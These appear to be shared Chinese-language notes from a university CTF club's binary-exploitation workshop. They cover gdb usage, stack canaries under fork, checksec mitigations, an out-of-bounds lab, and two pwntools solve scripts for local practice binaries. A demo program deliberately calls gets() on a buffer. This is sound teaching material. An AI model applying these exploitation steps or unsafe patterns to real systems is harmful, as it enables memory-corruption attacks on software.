# NCtfU - 3/11(r8) ###### tags: `nctfu2022spring` [toc] ## 開始時間 - PM 8:00 ## Youtube links https://youtu.be/wgxQaJOeq3I (需要請聯繫 r8) ## 會參加 - idisused - sixkwnp - Mark(同時在跟老闆開會，不用等我QQ) - MiMiRinKo - ppodds ## 講者筆記 Docker 與特定的 kernel 這裡安裝 ubuntu 20.04 與 docker 即可 安裝好的 Ghidra 或者其他順手的工具 ``` 安裝 pwn 工具懶人包 https://github.com/r888800009/CTF-tool/tree/master/pwn_docker 題組 git clone https://github.com/r888800009/pwn-labs ``` [簡報](https://drive.google.com/file/d/1W97fqT77fcX_C35e3upckIbh2TnWTpjR/view?usp=sharing) (需要請聯繫 r8) 大綱 - Binary 的基礎知識介紹 - gdb 操作簡介 - Mitigations 簡介與操作 - OOB 漏洞 - pwntools [回饋表單](https://docs.google.com/forms/d/e/1FAIpQLSfIw0OI3H26h6OtiP6zd9fU8l5QXyUOPqUA0QRd2O2RGHfqLQ/viewform) ## 共筆 ## stack-frame 找尋 `/bin/sh` > search-pattern "/bin/sh" > > [+] Searching '/bin/sh' in memory [+] In '/usr/lib/x86_64-linux-gnu/libc-2.31.so'(0x7ffff7f69000-0x7ffff7fb7000), permission=r-- 0x7ffff7f835bd - 0x7ffff7f835c4 → "/bin/sh" 跳過 `puts` 輸出 > b *main+23 > r > set $rip=*main+31 > c ## 在 gdb 外面 attach 另外一個 /bin/sh 的 process > gdb-peda attach $(pidof sh) - 裡面的版本 > attach [pid of process] ## fork canary 不會 :( +1 <!-- 我決定先聽了 追不上...--> > set follow-fork-mode child > b *main+131 > r > canary fork的child process和parent process的canary是相同的 ```c= #include <stdio.h> #include <stdlib.h> #include <unistd.h> // gcc fork_canary.c -o ./fork_canary int main(int argc, char **argv) { size_t index; size_t *i = &index; int canary_offset = 0xd; // fork() pid_t pid = fork(); if (pid == -1) { perror("fork"); exit(EXIT_FAILURE); } // if child if (pid == 0) { printf("child canary?"); scanf("%p", &index); if (index == i[canary_offset]) puts("canary!"); else puts("not canary!"); } else { // if parent printf("parent canary: %p\n", i[canary_offset]); // wait for child int status; waitpid(pid, &status, 0); } char *buf[10]; gets(buf); } ``` > gcc mitigations.c -no-pie -lseccomp -o mitigations-nopie > checksec mitigations-nopie ``` Arch: amd64-64-little RELRO: Partial RELRO Stack: Canary found NX: NX enabled PIE: No PIE (0x400000) ``` ## oob2 > index: 5 > set: 0x5555555551a9 ## pwntools oob2 ```python= #!/usr/bin/env python3 # -*- coding: utf-8 -*- # This exploit template was generated via: # $ pwn template ./oob2 from pwn import * # Set up pwntools for the correct architecture exe = context.binary = ELF('./oob2') # Many built-in settings can be controlled on the command-line and show up # in "args". For example, to dump all data sent/received, and disable ASLR # for all created processes... # ./exploit.py DEBUG NOASLR def start(argv=[], *a, **kw): '''Start the exploit against the target.''' if args.GDB: return gdb.debug([exe.path] + argv, gdbscript=gdbscript, *a, **kw) else: return process([exe.path] + argv, *a, **kw) # Specify your GDB script here for debugging # GDB will be launched if the exploit is run via e.g. # ./exploit.py GDB gdbscript = ''' tbreak main continue '''.format(**locals()) #=========================================================== # EXPLOIT GOES HERE #=========================================================== # Arch: amd64-64-little # RELRO: Full RELRO # Stack: Canary found # NX: NX enabled # PIE: PIE enabled io = start() # shellcode = asm(shellcraft.sh()) # payload = fit({ # 32: 0xdeadbeef, # 'iaaa': [1, 2, 'Hello', 3] # }, length=128) # io.send(payload) # flag = io.recv(...) # log.success(flag) context.log_level = 'debug' address = io.recv().decode().split(' ')[1] io.sendline('5'.encode()) io.sendafter(b'set:', (address + '\n').encode()) io.interactive() ``` ```python= #!/usr/bin/env python3 # -*- coding: utf-8 -*- # This exploit template was generated via: # $ pwn template pwntools_packing from pwn import * # Set up pwntools for the correct architecture exe = context.binary = ELF('pwntools_packing') # Many built-in settings can be controlled on the command-line and show up # in "args". For example, to dump all data sent/received, and disable ASLR # for all created processes... # ./exploit.py DEBUG NOASLR def start(argv=[], *a, **kw): '''Start the exploit against the target.''' if args.GDB: return gdb.debug([exe.path] + argv, gdbscript=gdbscript, *a, **kw) else: return process([exe.path] + argv, *a, **kw) # Specify your GDB script here for debugging # GDB will be launched if the exploit is run via e.g. # ./exploit.py GDB gdbscript = ''' tbreak main continue '''.format(**locals()) #=========================================================== # EXPLOIT GOES HERE #=========================================================== # Arch: amd64-64-little # RELRO: Full RELRO # Stack: Canary found # NX: NX enabled # PIE: PIE enabled io = start() # shellcode = asm(shellcraft.sh()) # payload = fit({ # 32: 0xdeadbeef, # 'iaaa': [1, 2, 'Hello', 3] # }, length=128) # io.send(payload) # flag = io.recv(...) # log.success(flag) context.log_level = 'debug' for i in range(100): io.send(p32(int(io.recvline().decode()))) io.interactive() ```